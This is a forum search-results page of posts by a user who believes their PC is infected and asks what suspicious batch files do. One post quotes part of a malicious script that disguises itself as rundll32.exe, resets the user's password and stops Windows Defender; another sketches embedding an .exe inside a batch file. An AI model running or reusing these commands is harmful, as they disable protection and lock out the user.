Search found 7 matches

by skat3444
04 Jan 2013 13:56
Forum: DOS Batch Forum
Topic: What do this batch-file??? (another one) :(
Replies: 3
Views: 2953

Re: What do this batch-file??? (another one) :(

GOD DANGIT! :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :x :x

nooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooOOOOO

OHH GOD NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
by skat3444
04 Jan 2013 12:50
Forum: DOS Batch Forum
Topic: What do this batch-file??? (another one) :(
Replies: 3
Views: 2953

What do this batch-file??? (another one) :(

Hi Guys, after founding 32 viruses, i found a .bat file with this code (an virus?):


Mod Edit: Obfucscated code removed


can you say me, what is does and who can re-install it??? thanks very much :) :) :)
by skat3444
04 Jan 2013 06:36
Forum: DOS Batch Forum
Topic: Writing an exe via batch
Replies: 13
Views: 8646

Re: Writing an exe via batch

follow this steps: 1. write your .bat file 2. compile it 3. edit the .exe file (open in editor) 4. copy code 5. in the .bat code, who must write the code, type this: echo ##exampel## > exampel.exe echo ##exampel## >> exampel.exe echo ##exampel## >> exampel.exe ... only write one line of code in one ...
by skat3444
04 Jan 2013 06:23
Forum: DOS Batch Forum
Topic: How to jump to the root directory from current directory
Replies: 11
Views: 10972

Re: How to jump to the root directory from current directory

you can use the command CD..

example:


------------------------------
cd %username%\Downloads
start "downloaded file"
-----------------------------
by skat3444
04 Jan 2013 06:20
Forum: DOS Batch Forum
Topic: What do this Batch-File??
Replies: 6
Views: 4221

Re: What do this Batch-File??

:cry: oh man :/ dangit virus
by skat3444
03 Jan 2013 05:30
Forum: DOS Batch Forum
Topic: What do this Batch-File??
Replies: 6
Views: 4221

Re: What do this Batch-File??

Thanks for the quick answer.

Its importend to reinstall windows..?


(Sorry for my bad english :/)
by skat3444
03 Jan 2013 04:30
Forum: DOS Batch Forum
Topic: What do this Batch-File??
Replies: 6
Views: 4221

What do this Batch-File??

Hi Guys, my PC is in the moment very laggy, because i have an virus. So, after my research, i found a .bat file with this code: @echo off title rundll32.exe :run :: registry edits removed net user %username% NDS sc stop WinDefend sc stop Netzwerkmanager :start set rtr=%random% :: url removed :: %~dp...